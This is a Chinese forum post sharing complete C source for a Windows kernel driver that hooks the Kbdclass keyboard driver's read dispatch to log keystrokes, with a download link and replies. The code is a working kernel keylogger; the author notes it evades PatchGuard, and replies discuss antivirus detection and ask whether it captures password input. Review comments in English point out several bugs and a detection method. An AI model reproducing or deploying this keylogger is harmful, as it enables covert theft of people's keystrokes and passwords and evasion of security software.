[其他转载] 驱动级FSD HOOK键盘记录器

caizhe666 发表于 2020-4-7 10:05
看了一下,吾爱没人发驱动教程,我就占山为王了2333
希望没有班门弄斧!
1111111111111.png

KEYBOARD FSD HOOK

说明:技术仅供学习使用,如恶意利用,与作者无关!

技术简介

上一篇文章我们讲了NTFS FSD HOOK。其实,它不只这些功能,它还可以拦截键盘输入、拦截Create请求等等……
其代码也十分模板化:只需要用ObReferenceObjectByName取得驱动对象,然后把你需要HOOK的分发函数替换成我们的实现就可以了!
据我测试,不会触发PG(至少不会立刻)

我们驱动的分发函数是这样写的:

DriverObject->MajorFunction[IRP_MJ_CREATE] = (PDRIVER_DISPATCH)NtfsFsdCreate;

我们只要改了MajorFunction[IRP_MJ_CREATE],改成我们的,我们就能拦截IRP_MJ_CREATE请求!

Tips:这里我说一下,FSD HOOK不仅仅是文件系统HOOK,只要是MajorFunction都可以HOOK!

源码

Main.cpp

#include <ntifs.h>
#include <ntddkbd.h>
#include <ntdef.h>
#include <windef.h>

EXTERN_C_START
// Prototype for ObReferenceObjectByName. The kernel exports it but the public
// WDK headers do not declare it, which is why it is spelled out here. It is the
// only lookup this driver uses to reach the Kbdclass driver object by its
// object-manager name. On success the returned object carries an extra
// reference that the caller is expected to release with ObDereferenceObject.
NTSYSAPI NTSTATUS NTAPI ObReferenceObjectByName(
    __in PUNICODE_STRING ObjectName,
    __in ULONG Attributes,
    __in_opt PACCESS_STATE AccessState,
    __in_opt ACCESS_MASK DesiredAccess,
    __in POBJECT_TYPE ObjectType,
    __in KPROCESSOR_MODE AccessMode,
    __inout_opt PVOID ParseContext,
    __out PVOID* Object
);

// Object type for driver objects, exported by the kernel; passed to the lookup
// above so that only a \Driver\* object can match the name.
extern POBJECT_TYPE* IoDriverObjectType;
EXTERN_C_END

// Signature shared by every IRP_MJ_* dispatch routine (same shape as
// PDRIVER_DISPATCH); used to hold the original Kbdclass read dispatch.
typedef NTSTATUS(*IRP_MJ_SERIES)
(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    );

// Original Kbdclass IRP_MJ_READ dispatch routine, saved by DriverEntry when the
// hook is installed; Fake_KbdDispatchRead forwards every read to it. Stays NULL
// if the lookup in DriverEntry fails.
IRP_MJ_SERIES KbdRead = NULL;
// Referenced \Driver\Kbdclass driver object. Nothing in this file releases the
// reference.
PDRIVER_OBJECT KbdDrvObj;
// Not read anywhere in the visible code.
static int KbdStatus = 4;

// Scan-code -> ASCII lookup table: four planes of 84 entries each, in the order
// the inline comments give (normal, caps lock, shift, caps lock + shift). The
// index is the keyboard MakeCode; 0x00 marks keys with no printable character.
// Nothing in the visible code reads this table — the completion routine below
// logs raw scan codes only.
CONST BYTE AsciiTable[] = {
    0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //normal
    0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,
    0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,
    0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //caps
    0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,
    0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,
    0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //shift
    0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,
    0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,
    0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //caps + shift
    0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,
    0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,
    0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E
};

// Completion routine that Fake_KbdDispatchRead installs on every IRP_MJ_READ
// passing through the hooked Kbdclass dispatch. It runs when Kbdclass completes
// the read, i.e. once the system buffer holds keyboard input.
//
// DeviceObject/Irp: the completed request.
// Context: the completion routine the caller above Kbdclass had installed on
//          this stack location, or NULL if there was none.
// Returns the IRP's own completion status (see the note on the final return).
NTSTATUS Fake_KbdFsdReadCompletion(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
    if (NT_SUCCESS(Irp->IoStatus.Status))
    {
        // Kbdclass returns KEYBOARD_INPUT_DATA records in the system buffer.
        // Only the first record is inspected, and Irp->IoStatus.Information
        // (bytes actually returned) is never checked, so a successful
        // zero-length completion would still read one record.
        // NOTE(review): confirm Kbdclass never completes a READ with
        // Information == 0 before relying on this.
        LPVOID Buffer = Irp->AssociatedIrp.SystemBuffer;
        PKEYBOARD_INPUT_DATA KeyData = (PKEYBOARD_INPUT_DATA)Buffer;
        // Flags is a bit mask (KEY_BREAK marks a release; KEY_E0/KEY_E1 mark
        // extended-prefix make codes), so the non-zero test also reports an
        // extended key *press* as "UP". Output goes to the kernel debugger only.
        KdPrint(("%sScanCode:%x", KeyData->Flags ? "UP: " : "DOWN: ", KeyData->MakeCode));
    }
    // Standard completion-routine bookkeeping: keep the pending status
    // propagating up the stack.
    if (Irp->PendingReturned)
        IoMarkIrpPending(Irp);
    // Chain to the completion routine the caller above Kbdclass had set, but
    // with a NULL context: the caller's own Context pointer was overwritten
    // when this routine was installed, so that original context is lost.
    if ((Irp->StackCount > (ULONG)1) && (Context != NULL))
        return ((PIO_COMPLETION_ROUTINE)Context)(DeviceObject, Irp, NULL);
    else
        // Completion routines are expected to return STATUS_SUCCESS or
        // STATUS_MORE_PROCESSING_REQUIRED; returning the IRP's own status
        // relies on it never being the latter.
        return Irp->IoStatus.Status;
}

// Replacement for Kbdclass's IRP_MJ_READ dispatch routine. It does not service
// the read itself: it installs Fake_KbdFsdReadCompletion on the IRP and then
// forwards the request to the saved original dispatch (KbdRead).
//
// pDeviceObject/pIrp: the keyboard read request as delivered to Kbdclass.
// Returns whatever the original Kbdclass dispatch returns.
NTSTATUS Fake_KbdDispatchRead(IN PDEVICE_OBJECT pDeviceObject, IN PIRP pIrp)
{
    // The hook edits the *current* stack location — the one prepared by the
    // caller above Kbdclass — rather than the next-lower location that
    // IoSetCompletionRoutine would use in a proper filter driver.
    PIO_STACK_LOCATION irpSp;
    irpSp = IoGetCurrentIrpStackLocation(pIrp);

    // Assigned, not OR-ed: whatever invoke-on flags the caller had set are
    // replaced so that the fake routine always runs.
    irpSp->Control =
        SL_INVOKE_ON_SUCCESS |
        SL_INVOKE_ON_ERROR |
        SL_INVOKE_ON_CANCEL;

    // Stash the caller's completion routine where the fake routine can find it
    // (its Context parameter). This clobbers the caller's own Context pointer,
    // which is why the chained call in Fake_KbdFsdReadCompletion passes NULL.
    irpSp->Context = irpSp->CompletionRoutine;
    irpSp->CompletionRoutine = (PIO_COMPLETION_ROUTINE)Fake_KbdFsdReadCompletion;

    // Assumes the hook was installed (KbdRead non-NULL); DriverEntry only
    // guarantees that when the Kbdclass lookup succeeded.
    return KbdRead(pDeviceObject, pIrp);
}

// Driver entry point. Installs the hook: looks up the \Driver\Kbdclass driver
// object by name and atomically swaps its IRP_MJ_READ dispatch pointer for
// Fake_KbdDispatchRead, saving the original in KbdRead.
//
// No DriverUnload routine is registered, so the driver cannot be unloaded
// cleanly and the dispatch pointer is never restored; the reference taken by
// ObReferenceObjectByName is never released either.
// Returns the status of the Kbdclass lookup (STATUS_SUCCESS if it was found).
//
// Detection note: after this runs, Kbdclass's MajorFunction[IRP_MJ_READ] no
// longer points into the kbdclass.sys image, which is exactly what dispatch-
// table integrity checks look for.
EXTERN_C NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath)
{
    UNREFERENCED_PARAMETER(pDriverObject);
    UNREFERENCED_PARAMETER(pRegistryPath);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    UNICODE_STRING uniKbdDrvName = RTL_CONSTANT_STRING(L"\\Driver\\Kbdclass");
    // KernelMode lookup with no access state; on success KbdDrvObj is referenced.
    ntStatus = ObReferenceObjectByName(&uniKbdDrvName, OBJ_CASE_INSENSITIVE, 0, 0, *IoDriverObjectType, KernelMode, 0, (PVOID*)&KbdDrvObj);
    if (NT_SUCCESS(ntStatus))
    {
        // Never used.
        volatile PLONG64 HookPoint = NULL;
        // MmIsAddressValid only reports that the page is currently resident; it
        // is not a meaningful check for a pointer the kernel just returned.
        // The 64-bit exchange swaps the dispatch pointer in place and yields the
        // original, which the hook forwards to. The LONG64/ULONG64 casts tie
        // this to 64-bit builds.
        if (MmIsAddressValid(KbdDrvObj))
            KbdRead = (IRP_MJ_SERIES)InterlockedExchange64((PLONG64 volatile)(&KbdDrvObj->MajorFunction[IRP_MJ_READ]), (ULONG64)Fake_KbdDispatchRead);
    }
    else
        KdPrint(("KBD FSD HOOK Fail... Errorcode:%08X\n", ntStatus));
    return ntStatus;
}


---------------------------------------------------------------------------
话不多说,直接上图!
1111111111111.png

这个东西就可以搞很多事情了233
再次声明:请不要用于恶意用途!

DriverKeyboardLogger.zip (9.08 KB, 下载次数: 1010)



 楼主| caizhe666 发表于 2020-11-29 17:55
root1 发表于 2020-11-25 13:57
请教一下,你这个sys文件怎么使用,另外能捕获到密码控件的输入吗,有偿,可以加qq1556893783

不接这一类活哦~
Zeroliz 发表于 2020-4-13 11:48
火蜥蜴 发表于 2020-4-17 15:16
 楼主| caizhe666 发表于 2020-4-19 16:46

360还是什么qwq
火蜥蜴 发表于 2020-4-20 15:16
360,不过我关掉还是能用的,有些个别识别错误,不知道是输入快的原因不
火蜥蜴 发表于 2020-4-20 15:17

360,不过我关掉还是能用的,有些个别识别错误,不知道是输入快的原因不
love90090 发表于 2020-4-25 14:14
直接发现木马
 楼主| caizhe666 发表于 2020-5-5 11:41
估计我的签名被拉黑了,我做的驱动全部报毒,不加签名一个不报....
不名物 发表于 2020-5-7 10:40
感谢分享
dahai0405 发表于 2020-5-7 13:36
测试看看效果如何?